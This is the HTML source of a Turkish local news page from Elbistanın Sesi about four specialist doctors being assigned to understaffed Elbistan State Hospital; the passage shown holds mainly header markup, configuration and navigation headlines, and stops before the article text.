  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Hastaneye ‘pansuman’ gibi atama</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Birçok branşta doktor eksikliği ile karşı karşıya bulunan Elbistan Devlet Hastanesi&#039;ne 4 uzman hekim atanacak." />
<meta name="keywords" content="Hastaneye pansuman gibi atama" />
<meta name="news_keywords" content="Hastaneye pansuman gibi atama">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Hastaneye ‘pansuman’ gibi atama" />
<meta property="og:description" content="Birçok branşta doktor eksikliği ile karşı karşıya bulunan Elbistan Devlet Hastanesi&#039;ne 4 uzman hekim atanacak." />
  <meta property="og:image" content="https://www.elbistaninsesi.com/images/haberler/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Hastaneye ‘pansuman’ gibi atama" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" />
<meta name="twitter:domain" content="https://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Hastaneye ‘pansuman’ gibi atama" />
<meta name="twitter:description" content="Birçok branşta doktor eksikliği ile karşı karşıya bulunan Elbistan Devlet Hastanesi’ne 4 uzman hekim atanacak." />
<meta name="twitter:image:src" content="https://www.elbistaninsesi.com/images/haberler/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" /><link rel="alternate" href="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="https://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html">
<link rel="amphtml" href="https://www.elbistaninsesi.com/amp/guncel/hastaneye-pansuman-gibi-atama-h72326.html">
  <link rel="image_src" type="image/jpeg" href="https://www.elbistaninsesi.com/images/haberler/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Hastaneye ‘pansuman’ gibi atama" />
<meta itemprop="thumbnailUrl" content="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-12-27T16:55:20+02:00" />
<meta itemprop="image" content="https://www.elbistaninsesi.com/images/haberler/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Hastaneye pansuman gibi atama" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'https://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'https://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

<style>
.dikeyhaberler .haber {
    width: 197px;
}
.dikeyhaberler .haber img {
    width: 200px;
    height: 120px;
}
.row-fluid [class*="span"]:first-child {
    margin-left: 0;
}
.dikeyhaberler .haber:last-child {
    margin-left: 15px;
}
#syazar {
    background-color: #EFEEEE;
}
</style>    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">11.33</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">12.83</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">659.02</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1,915.43</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" title="Hastaneye ‘pansuman’ gibi atama" >Hastaneye ‘pansuman’ gibi atama</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistanli-guresci-bolge-birincisi-oldu-h72325.html" title="Elbistanlı güreşçi bölge birincisi oldu" >Elbistanlı güreşçi bölge birincisi oldu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/tuketici-dernekleri-zamli-aldiginiz-urunu-iade-edin-h72324.html" title="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”" >Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/eksi-20-dereceye-dusen-sogukta-donan-kaz-telef-oldu-h72323.html" title="Eksi 20 dereceye düşen soğukta donan kaz telef oldu" >Eksi 20 dereceye düşen soğukta donan kaz telef oldu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kahramanmaras-iletisim-baskanligindaki-tecrube-kursusunde-h72322.html" title="Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde" >Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kademeli-elektrik-faturasi-uygulamasi-1-ocakta-basliyor-h72321.html" title="Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor" >Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/ak-parti-yeni-ekonomi-modelini-anlatmak-icin-sahaya-indi-h72320.html" title="AK Parti yeni ekonomi modelini anlatmak için sahaya indi" >AK Parti yeni ekonomi modelini anlatmak için sahaya indi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/500-kisilik-ogrenci-yurdunun-ihale-takvimi-aciklandi-h72318.html" title="500 kişilik öğrenci yurdunun ihale takvimi açıklandı" >500 kişilik öğrenci yurdunun ihale takvimi açıklandı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistanspor-ilk-yarinin-son-macindan-1-puan-cikardi-h72313.html" title="Elbistanspor ilk yarının son maçından 1 puan çıkardı" >Elbistanspor ilk yarının son maçından 1 puan çıkardı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/hava-kirliligine-ab-destekli-cityair-projesi-cozum-uretecek-h72310.html" title="Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek" >Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="https://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="a1015d3d965cc759f8418329f819c8a5fdcda02d" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Hastaneye ‘pansuman’ gibi atama" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="https://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="https://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="https://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="https://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="https://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="https://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="https://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="https://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="https://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="https://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="https://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="https://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="https://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="https://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="https://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="https://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="https://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="https://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="https://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="https://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="WHATSAPP VEFAT HATTI"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/whatsapp_vefat_hatti_h66390_a8338.jpg" alt="WHATSAPP VEFAT HATTI" />
WHATSAPP VEFAT HATTI</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html" title="Ramazan Özcan 83 yaşında "><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/ramazan_ozcan_83_yasinda_h72319_43091.jpg" alt="Ramazan Özcan 83 yaşında " />
Ramazan Özcan 83 yaşında </a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/safiye-sahin-86-yasinda-h72317.html" title="Safiye Şahin 86 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/safiye_sahin_86_yasinda_h72317_3830e.jpg" alt="Safiye Şahin 86 yaşında" />
Safiye Şahin 86 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/anma-fatis-erdogan-2-h72316.html" title="Anma / Fatiş Erdoğan"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/anma_fatis_erdogan_h72316_366e7.jpg" alt="Anma / Fatiş Erdoğan" />
Anma / Fatiş Erdoğan</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" title="Hastaneye ‘pansuman’ gibi atama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" alt="Hastaneye ‘pansuman’ gibi atama" />
Hastaneye ‘pansuman’ gibi atama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/elbistanli-guresci-bolge-birincisi-oldu-h72325.html" title="Elbistanlı güreşçi bölge birincisi oldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/elbistanli_guresci_bolge_birincisi_oldu_h72325_53658.jpg" alt="Elbistanlı güreşçi bölge birincisi oldu" />
Elbistanlı güreşçi bölge birincisi oldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/tuketici-dernekleri-zamli-aldiginiz-urunu-iade-edin-h72324.html" title="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/tuketici_dernekleri_zamli_aldiginiz_urunu_iade_edin_h72324_fabd1.jpg" alt="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”" />
Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/eksi-20-dereceye-dusen-sogukta-donan-kaz-telef-oldu-h72323.html" title="Eksi 20 dereceye düşen soğukta donan kaz telef oldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/12/eksi_20_dereceye_dusen_sogukta_donan_kaz_telef_oldu_h72323_6226c.jpg" alt="Eksi 20 dereceye düşen soğukta donan kaz telef oldu" />
Eksi 20 dereceye düşen soğukta donan kaz telef oldu</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
